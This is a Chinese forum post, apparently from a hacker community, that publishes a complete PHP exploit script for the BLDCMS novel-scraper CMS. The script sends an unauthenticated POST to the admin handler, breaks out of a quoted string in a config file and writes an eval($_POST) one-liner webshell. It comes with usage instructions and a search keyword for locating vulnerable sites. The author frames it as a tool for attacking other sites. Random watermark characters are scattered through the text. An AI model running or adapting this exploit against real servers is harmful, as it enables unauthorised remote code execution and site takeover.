之前想搞一个黑阔站，发现旁站有一个站用了 BLDCMS，我就下载下来看了……找到了一个 getshell 漏洞！
* c! G" e' \( L2 X; I: [% c1 Y
* ^) w& ~* m/ x9 w D$ e
话说昨晚晴天小铸在 90sec 发现有人把这个 getshell 漏洞的分析发出来了，擦，居然被人先发了。
" @; g; M3 b2 Q " _ g# H! m# q5 ]/ \8 B3 `
既然都有人发了，我就把我之前写好的 EXP 放出来吧。说明：下面的代码是从带防复制水印的论坛页面恢复的（水印把随机字符插进了代码里，例如 “emptyempty”、“OST”、被拆开的 “$eval”），只能作为原始 EXP 的近似重建。利用前提是目标 magic_quotes_gpc=Off：脚本不带任何登录凭据，直接向 /admin/chuli.php?action=a_1 POST 表单，把含单引号的 sqlite 参数注入进 conn/config/normal2.php，从而写入一句话木马。仅限授权测试使用。
7 `7 T' H4 u, \& X
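<?php
/*
 * BLDCMS ("白老大" PHP novel-scraper CMS) GETSHELL proof of concept, 2013-03-21.
 * Credit: 数据流 @ wooyun (discovery and original code).
 *
 * NOTE(review): this listing was recovered from a forum page whose anti-copy
 * watermark interleaved random characters with the code ("emptyempty", "OST",
 * a "$ev"/"al" split across two lines). The text below is the obvious
 * reconstruction, not the author's original bytes. Use only against systems
 * you are authorised to test.
 */

// Usage banner. The PoC only works when the target runs with
// magic_quotes_gpc = Off, because the injected value has to carry a literal
// single quote to break out of the string the target writes to its config file.
echo "-------------------------------------------------------------------------------\r\n"
   . " BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP (GPC=Off)\r\n"
   . " Vulnerability discovery&Code by 数据流@wooyun QQ:981009941\r\n"
   . " 2013.3.21\r\n"
   . " 用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码)\r\n"
   . " 搜索关键字:\"开发者: 白老大小说\"\r\n"
   . "-------------------------------------------------------------------------------\r\n";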
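// Command-line arguments: target host, application base path, one-liner password.
// Read defensively so a missing argument is reported instead of raising a notice.
$url  = isset($argv[1]) ? $argv[1] : '';
$dir  = isset($argv[2]) ? $argv[2] : '';
$pass = isset($argv[3]) ? $argv[3] : '';

if (empty($pass) || empty($url)) {
    exit("请输入参数");
}

// Injected value: closes the single-quoted string the target (presumably)
// writes into conn/config/normal2.php, appends a one-liner webshell, and
// reopens the quote so the generated file still parses.
// NOTE(review): eval($_POST[...]) is an unauthenticated remote-code-execution
// backdoor by design. $pass is dropped into PHP source unescaped, so a password
// containing a double quote will break the generated file.
$eval = "';eval(\$_POST[\"" . $pass . "\"]);'";

// Form fields the a_1 handler expects; only "sqlite" carries the payload.
// http_build_query() percent-encodes the quotes and the semicolon; the target's
// PHP decodes them again before the value is written out, so the server sees
// exactly what the original hand-built body sent.
$fuckdata = http_build_query(array(
    'sitename'   => 'a',
    'qq'         => '1',
    'getcontent' => 'acurl',
    'tongji'     => 'a',
    'cmsmd5'     => '1',
    'sqlite'     => $eval,
));

/**
 * Sends the crafted POST to <dir>/admin/chuli.php?action=a_1 over a raw socket
 * (port 80 only, no session cookie) and reports where the webshell should end up.
 *
 * Fixes against the original: the request path now honours the <dir> argument
 * (the original always hit /admin/chuli.php while claiming the shell lives under
 * $dir), Content-Length matches the body that is actually sent, and the HTTP
 * status line is shown instead of printing "success" unconditionally.
 *
 * @param string $url  target host name or IP
 * @param string $pass one-liner password, already baked into $fuckdata
 */
function getshell($url, $pass)
{
    global $dir, $fuckdata;

    // '/cms/' -> '/cms', '' or '/' -> '' so paths never get doubled slashes.
    $base = rtrim('/' . ltrim($dir, '/'), '/');

    $request  = "POST " . $base . "/admin/chuli.php?action=a_1 HTTP/1.1\r\n";
    $request .= "Host: " . $url . "\r\n";
    $request .= "User-Agent: MSIE\r\n";
    $request .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $request .= "Content-Length: " . strlen($fuckdata) . "\r\n";
    $request .= "Connection: Close\r\n\r\n";
    $request .= $fuckdata;   // no trailing CRLFs: Content-Length must match the body

    $fp = @fsockopen($url, 80, $errno, $errstr, 15);
    if (!$fp) {
        exit("利用失败:请检查指定目标是否能正常打开");
    }
    if (!fwrite($fp, $request)) {
        fclose($fp);
        exit("利用失败");
    }

    $receive = '';
    while (!feof($fp)) {
        $receive .= fgets($fp, 1000);
    }
    fclose($fp);

    // Surface the status line so a 403/404/500 is not mistaken for a shell.
    $status = (string) strtok($receive, "\r\n");
    echo "HTTP status: " . $status . "\r\n";
    echo "$url$base/conn/config/normal2.php pass=$pass (如连接失败 请检查目标 GPC是否=off)\r\n";
}

getshell($url, $pass);
?>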
O% m" j" l' ~* [0 ^# ~ 0 `' m9 r. J- g. U4 s, W v; P) }
6 L7 ?: v& Y( Q6 ?, ~ ' c& P* L2 l8 [0 R8 s" t
by 数据流
C. w" s9 K' ]7 a7 t- T |